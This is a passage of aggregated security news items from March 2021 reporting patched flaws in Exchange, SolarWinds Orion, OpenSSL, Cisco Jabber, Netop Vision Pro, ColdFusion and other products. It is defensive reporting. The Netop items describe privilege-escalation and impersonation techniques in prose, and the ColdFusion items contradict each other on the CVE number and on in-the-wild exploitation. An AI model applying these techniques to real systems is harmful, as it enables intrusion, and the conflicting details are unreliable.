The recently exploited vulnerabilities were CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065. Even though Microsoft has released multiple security updates and a one-click mitigation tool, an investigation by CyberNews shows that thousands of servers remain vulnerable.
We gathered the data on how many potentially vulnerable unpatched servers there are at the moment. We were looking at the main vulnerability CVE-2021-26855, but it is clear that servers containing this particular vulnerability also contain other vulnerabilities listed above.
CyberNews has found 62,174 vulnerable Microsoft Exchange Servers, most of them in the US (13,877 vulnerable servers). Germany is the second most affected country at the moment with more than nine thousand servers still left unpatched. In France, the UK, Italy, and Russia, there are 3,389, 3,138, 2,877, and 2,517 vulnerable servers respectively.
The National Security Council (NSC) spokesperson said in a statement that the
number of vulnerable systems fell by 45% last week, and now there are less than
10,000 vulnerable systems. When the software bugs were first uncovered, more
than 120,000 entities in the US alone were found vulnerable.
At the beginning of March, Microsoft stressed the importance of patching all affected systems immediately to protect against these exploits and prevent future abuse across the ecosystem.
“In the attacks observed, the threat actor used these vulnerabilities to access on-premises Exchange Servers which enabled access to email accounts, and allowed installation of additional malware to facilitate long-term access to victim environments,” reads the advisory published by Microsoft.
Here you can find a step-by-step guide on how to install the March 2021 Microsoft Exchange Server security updates.
The Microsoft vulnerabilities attracted attention even from the White House.
“The cost of cyber incident response weighs particularly heavily on small businesses. Hence, we requested that Microsoft help small businesses with a simple solution to this incident. In response, Microsoft has released a one-click mitigation tool. We encourage every business or organization that has not yet fully patched and scanned their Exchange Server to download and run this free tool,” a statement by the White House says.
New Code Execution Flaws In Solarwinds Orion Platform
26.3.2021
Vulnerebility
Securityweek
Solarwinds has shipped a major security update to fix at least four documented security vulnerabilities, including a pair of bugs that be exploited for remote code execution attacks.
The patches were pushed out Thursday as part of a minor security makeover of the Orion Platform, the same compromised Solarwinds product that was exploited in recent nation-state software supply chain attacks.
The latest Orion Platform 2020.2.5 addresses at least four security flaws, one rated “critical” because of the risk of remote code execution attacks. The company did not release technical details of the vulnerability, which does not yet have a CVE assigned.
Solarwinds described that flaw simply as “RCE via Actions and JSON Deserialization.” The company warned that the critical bug was found via the test alert actions and noted that an Orion authenticated user is required to successfully launch an exploit.
A second bug, rated “high-risk” also brings remote code execution risk, Solarwinds warned. “The vulnerability can be used to achieve authenticated RCE as Administrator. In order to exploit this, an attacker first needs to know the credentials of an unprivileged local account on the Orion Server.”
The update also includes fixes for a “high-risk” stored-XSS vulnerability and a medium-severity issue that could lead to reverse-tabnabbing and open redirect attacks.
OpenSSL 1.1.1k Patches Two High-Severity Vulnerabilities
26.3.2021
Vulnerebility
Securityweek
OpenSSL 1.1.1k patches two high-severity vulnerabilities
The OpenSSL Project on Thursday announced the release of version 1.1.1k, which patches two high-severity vulnerabilities, including one related to verifying a certificate chain and one that can lead to a server crash.
The first security hole, tracked as CVE-2021-3450, has been described as a “problem with verifying a certificate chain when using the X509_V_FLAG_X509_STRICT flag.” The flaw was discovered by researchers at Akamai.
“Starting from OpenSSL version 1.1.1h a check to disallow certificates in the chain that have explicitly encoded elliptic curve parameters was added as an additional strict check. An error in the implementation of this check meant that the result of a previous check to confirm that certificates in the chain are valid CA certificates was overwritten. This effectively bypasses the check that non-CA certificates must not be able to issue other certificates,” the OpenSSL Project explained in its advisory.
The second vulnerability, tracked as CVE-2021-3449 and discovered by employees of telecoms giant Nokia, involves sending a specially crafted renegotiation ClientHello message from a client, and it can be exploited for denial-of-service (DoS) attacks.
“If a TLSv1.2 renegotiation ClientHello omits the signature_algorithms extension (where it was present in the initial ClientHello), but includes a signature_algorithms_cert extension then a NULL pointer dereference will result, leading to a crash and a denial of service attack,” reads the description of this vulnerability.
Servers running OpenSSL 1.1.1 are affected by CVE-2021-3449 if they have TLS 1.2 and renegotiation enabled — this is the default configuration.
Some companies have already started informing their customers about these OpenSSL vulnerabilities.
OpenSSL has come a long way in terms of security since the disclosure of the Heartbleed vulnerability back in 2014. Only three vulnerabilities were fixed in 2020, and only two of those were rated high severity. No high-severity issues were patched in OpenSSL in 2018 and 2019.
Hackers Start Exploiting Recent Vulnerabilities in Thrive Theme WordPress
Plugins
26.3.2021
Vulnerebility
Securityweek
Over 100,000 WordPress websites could be exposed to attacks targeting a couple of recently addressed vulnerabilities affecting Thrive Theme plugins, warns the Wordfence Threat Intelligence Team at WordPress security company Defiant.
The Thrive Themes represent a collection of themes and plugins that provide WordPress administrators with the means to quickly customize their websites.
Two vulnerabilities that the Thrive Themes team addressed earlier this month are currently being targeted in live attacks to upload arbitrary files to vulnerable websites, and provide attackers with backdoor control to them.
The most important of the bugs is a critical (CVSS score of 10) unauthenticated arbitrary file upload and option deletion vulnerability that affects all Thrive Theme’s Legacy Themes. The flaw exists because the Legacy Themes include an insecurely implemented function to automatically compress images during uploads.
The second bug is considered medium severity (CVSS score of 5.8) and is an unauthenticated option update issue. The flaw is rooted in the insecure implementation of the ability to integrate with Zapier, which is available in the Thrive Dashboard.
A REST API endpoint that is associated with Zapier functionality is registered and the endpoint could be accessed by supplying an empty api_key parameter, provided that Zapier was not enabled. This would allow attackers to add arbitrary data to a predefined option.
The two security holes can be chained together to deploy malicious code onto a vulnerable website, through a REST API endpoint that Thrive Legacy Themes register to compress images. The vulnerabilities can be abused to deliver executable PHP files, Wordfence says.
The security researchers say that attackers are already exploiting the two flaws in live attacks, and that more than 100,000 WordPress sites that rely on Thrive Theme products may be exposed to compromise.
As part of the observed attacks, adversaries upload a malicious PHP file to the vulnerable websites, with the chain exploit providing attackers with backdoor access to WordPress installations.
“Our security analysts have been able to forensically verify this intrusion vector on an individual site. In addition, we have found the payload added by this attack on over 1900 sites, all of which appear to have vulnerable REST API endpoints,” Wordfence says.
Vulnerable products include Legacy Themes (Rise, Ignition, and others, prior to version 2.0.0), Thrive Optimize (up to version 1.4.13.3), Thrive Comments (prior to 1.4.15.3), Thrive Headline Optimizer (versions up to 1.3.7.3), Thrive Themes Builder (versions before 2.2.4), Thrive Leads, Thrive Ultimatum, Thrive Quiz Builder, and Thrive Apprentice prior to version 2.3.9.4, Thrive Architect (before 2.6.7.4), and Thrive Dashboard (versions up to 2.3.9.3).
“For the time being, we urge that site owners running any of the Thrive Themes “legacy” themes to update to version 2.0.0 immediately, and any site owners running any of the Thrive plugins to update to the latest version available for each of the respective plugins,” the researchers conclude.
Another Critical RCE Flaw Discovered in SolarWinds Orion Platform
26.3.2021
Vulnerebility
Thehackernews
IT infrastructure
management provider SolarWinds on Thursday released a new update to its Orion
networking monitoring tool with fixes for four security vulnerabilities,
counting two weaknesses that could be exploited by an authenticated attacker to
achieve remote code execution (RCE).
Chief among them is a JSON deserialization flaw that allows an authenticated user to execute arbitrary code via the test alert actions feature available in the Orion Web Console, which lets users simulate network events (e.g., an unresponsive server) that can be configured to trigger an alert during setup. It has been rated critical in severity.
A second issue concerns a high-risk vulnerability that could be leveraged by an adversary to achieve RCE in the Orion Job Scheduler. "In order to exploit this, an attacker first needs to know the credentials of an unprivileged local account on the Orion Server," SolarWinds said in its release notes.
The advisory is light on technical specifics, but the two shortcomings are said
to have been reported via Trend Micro's Zero Day Initiative.
Besides the aforementioned two flaws, the update squashes two other bugs, including a high-severity stored cross-site scripting (XSS) vulnerability in the "add custom tab" within customize view page (CVE-2020-35856) and a reverse tabnabbing and open redirect vulnerability in the custom menu item options page (CVE-2021-3109), both of which require an Orion administrator account for successful exploitation.
The new update also brings a number of security improvements, with fixes for preventing XSS attacks and enabling UAC protection for Orion database manager, among others.
The latest round of fixes arrives almost two months after the Texas-based company addressed two severe security vulnerabilities impacting Orion Platform (CVE-2021-25274 and CVE-2021-25275), which could have been exploited to achieve remote code execution with elevated privileges.
Orion users are recommended to update to the latest release, "Orion Platform 2020.2.5," to mitigate the risk associated with the security issues.
Critical Cisco Jabber Bug Could Let Attackers Hack Remote Systems
26.3.2021
Vulnerebility
Thehackernews
Cisco on Wednesday released software updates to address multiple vulnerabilities affecting its Jabber messaging clients across Windows, macOS, Android, and iOS.
Successful exploitation of the flaws could permit an "attacker to execute arbitrary programs on the underlying operating system with elevated privileges, access sensitive information, intercept protected network traffic, or cause a denial of service (DoS) condition," the networking major said in an advisory.
The issues concern a total of five security vulnerabilities, three of which (CVE-2021-1411, CVE-2021-1417, and CVE-2021-1418) were reported to the company by Olav Sortland Thoresen of Watchcom, with two others (CVE-2021-1469 and CVE-2021-1471) uncovered during internal security testing.
Cisco notes that the flaws are not dependent on one another, and that exploitation of any one of the vulnerabilities doesn't hinge on the exploitation of another. But in order to do this, an attacker needs to be authenticated to an Extensible Messaging and Presence Protocol (XMPP) server running the vulnerable software, as well as be able to send XMPP messages.
CVE-2021-1411, which concerns an arbitrary program execution vulnerability in its Windows app, is also the most critical, with a CVSS score of 9.9 out of a maximum of 10. According to Cisco, the flaw is due to improper validation of message content, thus making it possible for an attacker to send specially-crafted XMPP messages to the vulnerable client and execute arbitrary code with the same privileges as that of the user account running the software.
Besides CVE-2021-1411, four other Jabber flaws have also been fixed by Cisco, counting —
CVE-2021-1469 (Windows) - An issue with improper validation of message content
that could result in arbitrary code execution.
CVE-2021-1417 (Windows) - A
failure to validate message content that could be leveraged to leak sensitive
information, which can then fuel further attacks.
CVE-2021-1471 (Windows,
macOS, Android, iOS) - A certificate validation vulnerability that could be
abused to intercept network requests and even modify connections between the
Jabber client and a server
CVE-2021-1418 (Windows, macOS, Android, iOS) - An
issue arising from improper validation of message content that could be
exploited by sending crafted XMPP messages to cause a denial-of-service (DoS)
condition.
This is far from the first time Norwegian cybersecurity firm
Watchcom has uncovered flaws in Jabber clients. In September 2020, Cisco
resolved four flaws in its Windows app that could permit an authenticated,
remote attacker to execute arbitrary code. But after three of the four
vulnerabilities were not "sufficiently mitigated," the company ended up
releasing a second round of patches in December.
In addition to the fix for Jabber, Cisco has also published 37 other advisories that go into detail about security updates for a number of medium and high severity issues affecting various Cisco products.
Cisco Jabber for Windows, macOS, Android and iOS is affected by a critical issue
25.3.2021
Vulnerebility
Securityaffairs
Cisco has addressed a critical arbitrary program execution flaw in its Cisco
Jabber client software for Windows, macOS, Android, and iOS.
Cisco has
addressed a critical arbitrary program execution issue, tracked as
CVE-2021-1411, that affects several versions of Cisco Jabber client software for
Windows, macOS, Android, and iOS.
Cisco Jabber delivers instant messaging, voice and video calls, voice messaging, desktop sharing, conferencing, and presence.
The CVE-2021-1411 vulnerability stems from the improper input validation of incoming messages’ contents and was rated by Cisco with a CVSS score of 9.9 out of 10.
“Multiple vulnerabilities in Cisco Jabber for Windows, Cisco Jabber for MacOS, and Cisco Jabber for mobile platforms could allow an attacker to execute arbitrary programs on the underlying operating system with elevated privileges, access sensitive information, intercept protected network traffic, or cause a denial of service (DoS) condition.” reads the advisory published by Cisco.
The vulnerability can be only exploited by attackers that are authenticated to
an XMPP server used by the vulnerable software which is used to send
specially-crafted XMPP messages to a vulnerable device.
The flaw could be
exploited without user interaction by an authenticated, remote attacker to
execute arbitrary code on Windows, macOS, Android, or iOS devices running
unpatched Jabber client software.
“A vulnerability in Cisco Jabber for Windows could allow an authenticated, remote attacker to execute programs on a targeted system.” continues the advisory. “This vulnerability is due to improper validation of message content. An attacker could exploit this vulnerability by sending crafted XMPP messages to the affected software. A successful exploit could allow the attacker to cause the application to execute arbitrary programs on the targeted system with the privileges of the user account that is running the Cisco Jabber client software, which could result in arbitrary code execution.”
The IT giant added that the issue does not affect Jabber client software configured for Team Messaging or Phone-only modes.
The flaw affects Cisco Jabber for Windows, macOS, Android, or iOS, versions 12.9 or earlier.
The flaw was reported by Olav Sortland Thoresen of Watchcom, who also reported the CVE-2021-1417, and CVE-2021-1418 vulnerabilities. The Cisco Product Security Incident Response Team (PSIRT) said it is not aware attacks in the wild exploiting the vulnerabilities described in its advisory.
Cisco also addressed other four other high and medium severity flaws in Jabber software, tracked as CVE-2021-1417, CVE-2021-1418, CVE-2021-1469, and CVE-2021-1471.
Below the details of the issues:
CVE-2021-1469: Arbitrary Program Execution Vulnerability
CVE-2021-1417:
Information Disclosure Vulnerability
CVE-2021-1471: Certificate Validation
Vulnerability
CVE-2021-1418: Denial of Service Vulnerability
Below the
list of CVE IDs affecting each platform:
JABBER PLATFORM ASSOCIATED CVE IDS
Windows CVE-2021-1411, CVE-2021-1417,
CVE-2021-1418, CVE-2021-1469, and CVE-2021-1471
macOS CVE-2021-1418 and
CVE-2021-1471
Android and iOS CVE-2021-1418 and CVE-2021-1471
Critical Flaws Affecting GE's Universal Relay Pose Threat to Electric Utilities
24.3.2021
Vulnerebility
Thehackernews
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has warned of critical security shortcomings in GE's Universal Relay (UR) family of power management devices.
"Successful exploitation of these vulnerabilities could allow an attacker to access sensitive information, reboot the UR, gain privileged access, or cause a denial-of-service condition," the agency said in an advisory published on March 16.
GE's universal relays enable integrated monitoring and metering, high-speed communications, and offer simplified power management for the protection of critical assets.
The flaws, which affect a number of UR advanced protection and control relays, including B30, B90, C30, C60, C70, C95, D30, D60, F35, F60, G30, G60, L30, L60, L90, M60, N60, T35 and T60, were addressed by GE with the release of an updated version of the UR firmware (version 8.10) made available on December 24, 2020.
The patches resolve a total of nine vulnerabilities, the most important of which concerns an insecure default variable initialization, referring to the initialization of an internal variable in the software with an insecure value. The vulnerability (CVE-2021-27426) is also rated 9.8 out of 10, making it a critical issue.
"By sending a specially crafted request, an attacker could exploit this vulnerability to bypass access restrictions," IBM noted in its alert.A second severe vulnerability relates to unused hard-coded credentials in the bootloader binary (CVE-2021-27430, CVSS score 8.4), which could be exploited by an attacker "with physical access to the UR [Intelligent Electronic Device] can interrupt the boot sequence by rebooting the UR."
Also fixed by GE is another high severity flaw (CVE-2021-27428, CVSS score 7.5)
that could permit an unauthorized user to upgrade firmware without appropriate
privileges.
Four other vulnerabilities involve two improper input validations
(CVE-2021-27418, CVE-2021-27420) and two flaws concerning exposure of sensitive
information to unauthorized parties (CVE-2021-27422, CVE-2021-27424), thereby
exposing the device to cross-site scripting attacks, permitting an attacker to
access critical information without authentication, and even render the
webserver unresponsive.
Lastly, all versions of UR firmware prior to 8.1x were found to use weak encryption and MAC algorithms for SSH communication, making them more vulnerable to brute-force attacks.
"CISA recommends users take defensive measures to minimize the risk of exploitation of these vulnerabilities," the agency said. "Minimize network exposure for all control system devices and/or systems and ensure that they are not accessible from the Internet, [and] locate control system networks and remote devices behind firewalls and isolate them from the business network."
Critical Security Bugs Fixed in Virtual Learning Software
23.3.2021 Vulnerebility Threatpost
Remote ed software bugs give attackers wide access student computers, data.
Netop, the company behind a popular software tool designed to let teachers remotely access student computers, has fixed four security bugs in its platform.
Researchers said that the critical vulnerabilities in the company’s Netop Vision Pro system could allow attackers to hijack school networks, deliver malware, determine IP addresses of students, eavesdrop and more.
The flaws were disclosed to Netop on Dec. 11. By late February, the company had issued an update addressing several of the concerns (in Netop Vision Pro version 9.7.2), said researchers.
“In Netop Vision Pro 9.7.2, released in late February, Netop has fixed the local privilege escalations, encrypted formerly plaintext Windows credentials, and mitigated the arbitrary read/writes on the remote filesystem within the MChat client,” according to a Sunday report by the McAfee Labs Advanced Threat Research team, which discovered the flaws.
Unencrypted Netop Network Traffic
The first issue discovered (“CWE-319:
Cleartext Transmission of Sensitive Information”) was unencrypted network
traffic, said researchers. They added that part of the service included a
constant stream of screenshots of the student computer to the teacher – opening
up potential privacy issues.
“Since there is no encryption, these images were sent in the clear,” the report said. “Anyone on the local network could eavesdrop on these images and view the contents of the students’ screens remotely. A new screenshot was sent every few seconds, providing the teacher and any eavesdroppers a near-real time stream of each student’s computer.”
Researchers were able to grab the screen captures by setting the card to promiscuous mode and using a network monitoring tool for image files like Driftnet. The one caveat with this attack is that any threat actor who wanted to monitor these conversations would need access to the same local network, they said.
Reverse Engineering the Netop Network
Another bug (“CWE-863: Incorrect
Authorization”) stemmed from the ability for an attacker to emulate a teacher’s
workstation. Researchers reverse engineered teacher User Datagram Protocol (UDP)
messages, which ping the network to alert it to where the teacher is on the
network. They said they used a “fuzzer” automated tester to input random
sequences of data into the system and watch what happened next.
“After a few days of fuzzing with UDP packets, we were able to identify two things,” the report said. “First, we observed a lack of length checks on strings and second, random values sent by the fuzzer were being written directly to the Windows registry.” The report also found the application never crashed or allowed them to overwrite any important data.
Researchers also found, after the first UDP message was sent, any messages sent after that were Transmission Control Protocol (TCP), which allowed the teacher to keep the socket open for the rest of class.
Further evaluation revealed three the authentication codes, which the researchers called “tokens,” controlled access between student and teacher. Teachers and students were each issued a static, unique code. A third authentication “token” was also required, which their analysis revealed matched the “range of memory being allocated to the heap” digit within the code, making it predictable and exploitable by attackers.
From there, researchers had what they needed to create their own teacher workstation, meaning an “attacker could emulate a teacher and execute arbitrary commands,” the report explained. Attackers armed with teacher access would be able to launch applications on the student machines and more, said researchers.
Privileges & Permissions Bugs
The researchers also found privileges weren’t
being dropped – meaning they were determined when the software was installed,
but weren’t checked by a “ShellExecute” path after that.
“We found four cases where the privileges were not reduced, however none of them were accessible over the network,” the researchers said. “Regardless, they still could potentially be useful, so we investigated each.” This bug was referenced as “CWE-269: Incorrect Privilege Assignment.”
The first was when users opened Internet Explorer with a prefilled URL and the remaining three related to plugins that bypassed file filters within “Save As,” “Screen Shot Viewer,” and the About page’s “System Information” windows.
“We used an old technique which uses the ‘Save as’ button to navigate to the folder where cmd.exe is located and execute it,” the researchers explained. “The resulting CMD process inherits the System privileges of the parent process, giving the user a System-level shell.”
The team was able to use this attack to “screen blank students,” restart the Netop application, block internet access and more.
Hijacking the Chat Function
Finally, researchers were able to hijack the Chat
function to send text or files to student computers, due to a bug (“CWE-276:
Incorrect Default Permissions”) that scored 9.5 (out of 10) on the CVSS score,
“the highest of the bunch,” according to the report.
“Delving deeper into the functionality of the chat application, we found that the teacher also has the ability to read files in the student’s ‘work directory’ and delete files within it,” the report said. “Due to our findings demonstrated with CVE-2021-27195, we can leverage our emulation code as an attacker to write, read, and delete files within this ‘work directory’ from a remote attack vector on the same local network.”
The application is always running and makes the assumption every device on the network could be a teacher and lets everyone else know where they are, making the system easy for threat actors to hijack for any number of purposes, the researchers explained.
“An attacker doesn’t have to compromise the school network; all they need is to find any network where this software is accessible, such as a library, coffee shop, or home network,” the report said. “It doesn’t matter where one of these student’s PCs gets compromised as a well-designed malware could lay dormant and scan each network the infected PC connects to, until it finds other vulnerable instances of Netop Vision Pro to further propagate the infection.”
Cyberattacks Rampant on Education Sector
As service providers across
industries are faced with the reality that security needs to be one of the
primary drivers behind their business, the need to have a system in place to
respond and communicate with ethical security researchers and then make
appropriate fixes is becoming exponentially more crucial. Specifically,
education is being targeted for attack, according to a December statement
released by the FBI and the Cybersecurity and Infrastructure Security Agency
(CISA), most notably by ransomware. The CISA, FBI report said reported incidents
of ransomware attacks on K-12 schools made up 57 percent of all those reported
between last August and September.
“Entire industries moved from physical to digital operations in 2020 and education was no exception,” Yaniv Bar-Dayan, CEO at Vulcan Cyber, told Threatpost. “School districts took a hard pivot on their approach to instructor-led learning as well as the security of teachers and students. With teachers using more software than ever, and software the most vulnerable it has ever been, IT security teams are playing a game of vulnerability whack-a-mole to deliver a secure online learning experience. This isn’t easy without the ability to prioritize, orchestrate, automate and measure remediation campaigns and outcomes.”
Just last month, the FBI sent a follow-up “Flash” alert to the security community that ransomware PYSA is pummeling the education sector, including higher education, K-12 education and seminaries.
The Netop Response
For its part, Netop has applied fixes to everything
reported by McAfee, except the network encryption bit, which is in the works.
“The network traffic is still unencrypted, including the screenshots of the student computers but Netop has assured us it is working on implementing encryption on all network traffic for a future update,” researchers said.
That said, researchers praised Netop’s quick response time to the initial security report: “We’d like to recognize Netop’s outstanding response and rapid development and release of a more secure software version and encourage industry vendors to take note of this as a standard for responding to responsible disclosures from industry researchers,” they said.
Adobe Fixes Critical ColdFusion Flaw in Emergency Update
23.3.2021 Vulnerebility Threatpost
Attackers can leverage the critical Adobe ColdFusion flaw to launch arbitrary code execution attacks.
In an unscheduled security update, Adobe is warning of a critical security flaw in its ColdFusion platform, used for building web applications.
The security alert comes two weeks after Adobe’s regularly-scheduled updates. During these updates, the tech company issued patches for a slew of critical security vulnerabilities, which, if exploited, could allow for arbitrary code execution on vulnerable Windows systems.
The latest flaw (CVE-2021-21087) exists in ColdFusion versions 2016 (Update 16 and earlier), 2018 (Update 10 and earlier) and 2021 (Version 2021.0.0.323925), and could lead to arbitrary code execution.
“Adobe is not aware of any exploits in the wild for any of the issues addressed in these updates,” according to Adobe on Monday.
The vulnerability stems from improper input validation, which is a type of issue (previously plaguing other Adobe products) that occurs when the affected product does not validate input. This can affect the control flow or data flow of a program, and allow for an attacker to launch a slew of malicious attacks. Further information on the flaw – including where in ColdFusion it exists, and how difficult it is to exploit, were not addressed; Threatpost has reached out to Adobe for further comment.
The flaw has been corrected in the following versions of ColdFusion: ColdFusion 2016 (update 17), ColdFusion 2018 (update 11) and ColdFusion 2021 (update 1). See below for the updated versions.
Source: Adobe
Adobe said the security update is a “priority 2,” meaning that it resolves vulnerabilities “in a product that has historically been at elevated risk” – but for which there are currently no known exploits.
“Based on previous experience, we do not anticipate exploits are imminent,” for “priority 2” updates, said Adobe. However, “as a best practice, Adobe recommends administrators install the update soon (for example, within 30 days).”
Adobe credited Josh Lane with discovering and reporting the flaw.
ColdFusion, a web-programming language providing a platform for building and deploying web and mobile applications, has previously been privy to various security flaws.
In April, Adobe released patches for “important”-severity vulnerabilities in ColdFusion, which if exploited, could enable attackers to view sensitive data, gain escalated privileges, and launch denial-of-service attacks. And in 2019, Adobe issued unscheduled security updates to fix two critical flaws in its ColdFusion product. The critical vulnerabilities could have enabled an attacker to either execute arbitrary code or bypass access control on impacted systems.
Adobe addresses a critical vulnerability in ColdFusion product
23.3.2021
Vulnerebility
Securityaffairs
Adobe has released security updates to address a critical vulnerability in the
ColdFusion product (versions 2021, 2016, and 2018) that could lead to arbitrary
code execution.
Adobe has released security patches to address a critical
vulnerability in Adobe ColdFusion that could be exploited by attackers to
execute arbitrary code on vulnerable systems. The issue, tracked as
CVE-2021-21087 is caused by improper input validation.
“Adobe has released security updates for ColdFusion versions 2021, 2016 and 2018. These updates resolve a critical vulnerability that could lead to arbitrary code execution. ” reads the advisory published by the software giant.
The flaw affects ColdFusion 2016 Update 16 and earlier version, all ColdFusion 2018 Update 10, and earlier versions All ColdFusion 2021 Version 2021.0.0.323925.
Adobe recommends updating your ColdFusion JDK/JRE to the latest version of the LTS releases for 1.8 and JDK 11, it pointed out that installing the ColdFusion update without a corresponding JDK update will NOT secure the server.
The software giant also recommends customers apply the security configuration settings as outlined on the ColdFusion Security page as well as review the respective Lockdown guides.
ColdFusion 2018 Auto-Lockdown guide
ColdFusion 2016 Lockdown Guide
ColdFusion 2021 Lockdown Guide
The vulnerability was reported by Josh Lane,
the company confirmed that it is now aware of attacks in the wild exploiting the
CVE-2021-20187 vulnerability.
Abusing distance learning software to hack into student PCs
23.3.2021
Vulnerebility
Securityaffairs
Experts uncovered critical flaws in the Netop Vision Pro distance learning
software used by many schools to control remote learning sessions.
McAfee
discovered multiple security vulnerabilities in the Netop Vision Pro popular
distance learning software which is used by several teachers to control remote
learning sessions.
The distance learning software implements multiple features, including viewing
student screens, chat functions, and freezing student screens.
McAfee’s Advanced Threat Research (ATR) team has discovered four vulnerabilities, tracked CVE-2021-27192, CVE-2021-27193, CVE-2021-27194, and CVE-2021-27195, that could be exploited by attackers for multiple malicious purposes, including taking over students’ computers.
“Our research into this software led to the discovery of four previously unreported critical issues, identified by CVE-2021-27192, CVE-2021-27193, CVE-2021-27194 and CVE-2021-27195. These findings allow for elevation of privileges and ultimately remote code execution, which could be used by a malicious attacker, within the same network, to gain full control over students’ computers.” reads the post published by McAfee.
To test the software, experts set up the Netop software in a normal configuration and environment on four virtual machines on a local network. The test environment was composed of three systems configured as students and only one as a teacher.
The first issue that emerged is that all network traffic was unencrypted and there was no option to turn it on. Experts also noticed that when students connect to the classroom they would unknowingly begin sending screenshots to the teacher.
Experts were also able to eavesdrop and modify traffic generated when a teacher starts a session. The researchers were able to modify the data to masquerade as the teacher host, perform local elevation of privilege (LPE) and achieve System privileges.
Reversing the MChat network traffic and analyzing the Chat features experts discovered that it was possible to overwrite a file and execute it with System privileges.
“With the successful MChat handshake complete we needed to send a packet that
would change the “work directory” to that of our choosing. Figure 21 shows the
packet as a Scapy layer used to change the work directory on the student’s PC.”
continues the report. “The Netop plugin directory was a perfect target directory
to change to since anything executed from this directory would be executed as
System.”
Experts also discovered that Netop Vision Pro student profiles also
broadcast their presence on the network every few seconds. This mechanism was
implemented to search techers on every connected network, but open the doors to
an attack to an entire school system.
Experts pointed out that attackers
could chain these issues to get remote code execution with System privileges
from any device on the local network.
“The largest impact being remote code execution of arbitrary code with System privileges from any device on the local network. This scenario has the potential to be wormable, meaning that the arbitrary binary that we run could be designed to seek out other devices and further the spread.” concludes the report. “In addition, if the “Open Enrollment” option for a classroom is configured, the Netop Vision Pro student client broadcasts its presence on the network every few seconds.”
The experts privately disclosed the flaws to the vendor on December 11, some of which were addressed with the release of the software version 9.7.2. Addressed flaws are the LPE issues and the encryption of credentials.
RCE flaw in Apache OFBiz could allow to take over the ERP system
23.3.2021
Vulnerebility
Securityaffairs
The Apache Software Foundation fixed a high severity remote code execution flaw
in Apache OFBiz that could have allowed attackers to take over the ERP system.
The Apache Software Foundation addressed last week a high severity vulnerability
in Apache OFBiz, tracked as CVE-2021-26295, that could have allowed a remote,
unauthenticated attacker to take over the ERP system.
Unsafe deserialization occurs when malformed data or unexpected data could be used to abuse application logic, deny service, or execute arbitrary code when deserialized. This category of issue could compromise the availability, authorization process, and bypass access control.
Apache OFBiz is an open-source enterprise resource planning (ERP) system that provides a suite of enterprise applications that integrate and automate many of the business processes of an enterprise.
The issue is unsafe deserialization that affects versions prior to 17.12.06, it could allow unauthorized remote attackers to execute arbitrary code on the server and potentially take over the open-source ERP system.
“Apache OFBiz has unsafe deserialization prior to 17.12.06. An unauthenticated attacker can use this vulnerability to successfully take over Apache OFBiz.” wrote Jacques Le Roux.
The flaw was reported by r00t4dm at Cloud-Penetrating Arrow Lab, MagicZero from SGLAB of Legendsec at Qi’anxin Group, and Longofo at Knownsec 404 Team.
Admins have to upgrade their OFBiz install to the latest version (17.12.06) as soon as possible.
Remote Code Execution Vulnerability Patched in Apache OFBiz
23.3.2021
Vulnerebility
Securityweek
One of the vulnerabilities addressed by the latest update for Apache OFBiz is an unsafe Java deserialization issue that could be exploited to execute code remotely, without authentication.
A Java-based web framework, Apache OFBiz is an open source enterprise resource planning (ERP) system that includes a suite of applications to automate business processes within enterprise environments, and which can be used across any industry.
OFBiz is one of the platforms that was affected by a Java serialization vulnerability identified and reported in 2015, and which impacted the Apache Commons Collections and Apache Groovy libraries that OFBiz relies on.
While patches were released for both libraries, the risks associated with the use of RMI, JNDI, JMX, or Spring – and possibly other Java classes – was not eliminated. The later implementation of a whitelist was meant to add further protections from possible Java serialization vulnerabilities.
Following the addressing of an issue (CVE-2019-0189) with ObjectInputStream class, where users needed to add their own objects/classes to the list of objects used by OFBiz OOTB (Out Of The Box), Apache also implemented the option to deny objects.
Apache OFBiz 17.12.06, the sixth and final release of the 17.12 series, includes a patch for CVE-2021-26295, adding a “blacklist (to be renamed soon to denylist) in Java serialization.”
Tracked as OFBIZ-12167, the commit that addresses the security issue “adds an example based on RMI which is known to be a problem,” OFBiz expert developer Jacques Le Roux says.
The unsafe deserialization, he explains, could be exploited to execute code remotely, essentially allowing an unauthenticated attacker to successfully take over Apache OFBiz. Updating OFBiz to the 17.12.06 package should prevent possible exploitation attempts.
Adobe Patches Critical ColdFusion Security Flaw
23.3.2021
Vulnerebility
Securityweek
Adobe has released an urgent patch for a potentially dangerous security vulnerability in Adobe ColdFusion, the platform used for building and deploying mobile and web apps.
“These updates resolve a critical vulnerability that could lead to arbitrary code execution,” Adobe said in an advisory issued on Monday.
The security updates are available for ColdFusion versions 2021 (including version 2021.0.0.323925), 2016 and 2018.
Adobe said it has not observed signs of in-the-wild exploitation targeting the new CVE-2021-20187 vulnerability.
According to Adobe’s advisory, the vulnerability is described as “improper input validation” that could lead to arbitrary remote code execution.
The company recommends that users update the ColdFusion JDK/JRE to the latest version of the LTS releases for 1.8 and JDK 11. “Applying the ColdFusion update without a corresponding JDK update will NOT secure the server,” Adobe warned.
The company also published security configuration settings and lockdown guides for ColdFusion deployments.
Popular Netop Remote Learning Software Found Vulnerable to Hacking
23.3.2021
Vulnerebility
Thehackernews
Cybersecurity researchers on Sunday disclosed multiple critical vulnerabilities in remote student monitoring software Netop Vision Pro that a malicious attacker could abuse to execute arbitrary code and take over Windows computers.
"These findings allow for elevation of privileges and ultimately remote code execution which could be used by a malicious attacker within the same network to gain full control over students' computers," the McAfee Labs Advanced Threat Research team said in an analysis.
The vulnerabilities, tracked as CVE-2021-27192, CVE-2021-27193, CVE-2021-27194, and CVE-2021-27195, were reported to Netop on December 11, 2020, after which the Denmark-based company fixed the issues in an update (version 9.7.2) released on February 25.
"Version 9.7.2 of Vision and Vision Pro is a maintenance release that addresses several vulnerabilities, such as escalating local privileges sending sensitive information in plain text," the company stated in its release notes.
Netop counts half of the Fortune 100 companies among its customers and connects more than 3 million teachers and students with its software. Netop Vision Pro allows teachers to remotely perform tasks on students' computers, such as monitoring and managing their screens in real time, restricting access to a list of allowed Web sites, launching applications, and even redirecting students' attention when they are distracted.
During the course of McAfee's investigation, several design flaws were uncovered, including:
CVE-2021-27194 - All network traffic between teacher and student is sent
unencrypted and in clear text (e.g., Windows credentials and screenshots)
without the ability to enable this during setup. In addition, screen captures
are sent to the teacher as soon as they connect to a classroom to allow
real-time monitoring.
CVE-2021-27195 - An attacker can monitor unencrypted
traffic to impersonate a teacher and execute attack code on student machines by
modifying the packet that contains the exact application to be executed, such as
